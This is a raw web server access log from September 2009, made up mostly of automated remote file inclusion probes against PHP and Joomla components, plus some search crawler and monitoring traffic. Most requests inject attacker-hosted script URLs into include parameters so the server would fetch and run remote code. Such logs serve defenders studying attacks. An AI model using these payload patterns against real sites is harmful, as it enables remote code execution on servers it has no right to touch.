72.11.145.8 - - [04/Sep/2009:02:54:12 -0400] "GET //include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:54:14 -0400] "GET /logs//include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
209.59.12.99 - - [04/Sep/2009:02:54:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.218.40.180 - - [04/Sep/2009:02:54:29 -0400] "GET /logs/access_log.Q109063000/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:02:54:30 -0400] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:02:54:30 -0400] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
211.115.89.97 - - [04/Sep/2009:02:55:43 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:02:55:43 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:02:55:43 -0400] "GET /logs/access_log.Q109071600%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:02:55:43 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:02:56:37 -0400] "GET /logs/error_log.Q109083000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.218.40.180 - - [04/Sep/2009:02:56:56 -0400] "GET /logs/access_log.Q109081100/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
208.116.36.253 - - [04/Sep/2009:02:58:57 -0400] "GET /logs/access_log.Q109072000//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:02:58:57 -0400] "GET //include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:02:58:57 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:02:58:58 -0400] "GET /logs/access_log.Q109072000//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:02:58:58 -0400] "GET //include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:02:58:58 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
222.236.47.23 - - [04/Sep/2009:02:59:01 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:02:59:01 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:02:59:01 -0400] "GET /logs/error_log.Q109071800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:02:59:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.23 - - [04/Sep/2009:02:59:35 -0400] "GET /logs/error_log.Q109062600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:59:50 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:59:50 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:59:51 -0400] "GET /logs/error_log.Q109071800%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
201.82.194.38 - - [04/Sep/2009:02:59:40 -0400] "GET /logs/error_log.Q109081200 HTTP/1.1" 200 3085783 "-" "udvct nJneJeojf6iwpqnvdwo"
222.236.47.23 - - [04/Sep/2009:03:00:15 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:03:00:28 -0400] "GET /logs/error_log.Q109072900%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:00:40 -0400] "GET //common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:00:44 -0400] "GET /logs//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:00:44 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:00:56 -0400] "GET /logs/error_log.Q109062600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:01:04 -0400] "GET //common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:01:04 -0400] "GET /logs//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:01:04 -0400] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:01:05 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:01:05 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:13 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:13 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:13 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:13 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:01:20 -0400] "GET /logs/error_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:01:23 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:34 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:34 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:01:34 -0400] "GET /logs/access_log.Q109071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:01:58 -0400] "GET /logs/error_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:03:02:02 -0400] "GET /logs/error_log.Q109071100%20%20//common/db.php?commonpath=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:02:11 -0400] "GET /logs/error_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
208.116.36.253 - - [04/Sep/2009:03:02:42 -0400] "GET /logs/access_log.Q109072700//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.831"
208.116.36.253 - - [04/Sep/2009:03:02:43 -0400] "GET /logs/access_log.Q109072700//include/mail.inc.php?skin_board_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.831"
222.236.47.23 - - [04/Sep/2009:03:02:51 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:02:58 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:03:12 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:03:12 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:03:52 -0400] "GET /logs/access_log.Q109071000%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:03:54 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:03:55 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:03:03:56 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04941001 HTTP/1.1" 200 27017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [04/Sep/2009:03:04:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.236.100.30 - - [04/Sep/2009:03:04:45 -0400] "GET /logs//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:45 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:45 -0400] "GET //main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:50 -0400] "GET /logs/error_log.Q109072900%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:55 -0400] "GET /logs/access_log.Q109071900//searcharrays.php?addonDir=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:55 -0400] "GET /logs//searcharrays.php?addonDir=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:55 -0400] "GET //searcharrays.php?addonDir=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:56 -0400] "GET /logs/error_log.Q109051000%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:04:56 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:05:00 -0400] "GET /logs/access_log.Q109080500%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:05:01 -0400] "GET /logs/error_log.Q109071900//searcharrays.php?addonDir=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:05:21 -0400] "GET /logs/error_log.Q109071800//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:05:23 -0400] "GET /logs/access_log.Q109080700%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:05:23 -0400] "GET //?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:05:23 -0400] "GET /logs//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:05:31 -0400] "GET /logs/access_log.Q109070500%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:05:35 -0400] "GET /logs/error_log.Q109062600//components/com_facileforms/facileforms.frame.php?ff_compath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:05:36 -0400] "GET /logs/access_log.Q109051300%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:06:04 -0400] "GET /logs/access_log.Q109051400%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:06:11 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:06:13 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:03:06:30 -0400] "GET /logs/error_log.Q109070500%20%20//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:06:41 -0400] "GET /logs/error_log.Q109080500%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:06:41 -0400] "GET /logs/error_log.Q109073100%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:06:46 -0400] "GET /logs/error_log.Q109060100%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:06:55 -0400] "GET /logs/error_log.Q109051800%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:07:00 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:07:04 -0400] "GET /logs/access_log.Q109073100%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:03:07:40 -0400] "GET /images/download_cat_bone.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.38.136.251 - - [04/Sep/2009:03:08:12 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:12 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:12 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:13 -0400] "GET /modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:13 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:13 -0400] "GET /logs/error_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:19 -0400] "GET /logs/access_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:08:57 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:09:32 -0400] "GET /logs/access_log.Q109052500%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:09:32 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:09:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.136.251 - - [04/Sep/2009:03:09:39 -0400] "GET /logs/access_log.Q109061700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:09:41 -0400] "GET /logs/error_log.Q109082500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:09:42 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:09:42 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:09:42 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:09:46 -0400] "GET /logs/error_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:09:47 -0400] "GET //administrator/component/splugins/BackUp/Archive.php?bkpwp_plugin_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:09:47 -0400] "GET /logs//administrator/component/splugins/BackUp/Archive.php?bkpwp_plugin_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:09:47 -0400] "GET /logs/access_log.Q109070200//administrator/component/splugins/BackUp/Archive.php?bkpwp_plugin_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:09:47 -0400] "GET /logs/error_log.Q109070200//administrator/component/splugins/BackUp/Archive.php?bkpwp_plugin_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:09:56 -0400] "GET /logs/access_log.Q109060300%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:00 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:00 -0400] "GET /logs/error_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:04 -0400] "GET /logs/access_log.Q109072700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:10:08 -0400] "GET /logs/error_log.Q109060500%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:10:08 -0400] "GET /logs/access_log.Q109062800%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:10:23 -0400] "GET /logs/error_log.Q109060300%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:10:23 -0400] "GET /logs/access_log.Q109051200%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:10:23 -0400] "GET /logs/access_log.Q109053100%20%20//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:30 -0400] "GET /logs/error_log.Q109052500%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:30 -0400] "GET /logs/error_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:32 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:10:38 -0400] "GET /modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:41 -0400] "GET /logs/error_log.Q109072700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:10:43 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:10:43 -0400] "GET /logs/error_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:10:43 -0400] "GET /logs/access_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:10:44 -0400] "GET /logs/error_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
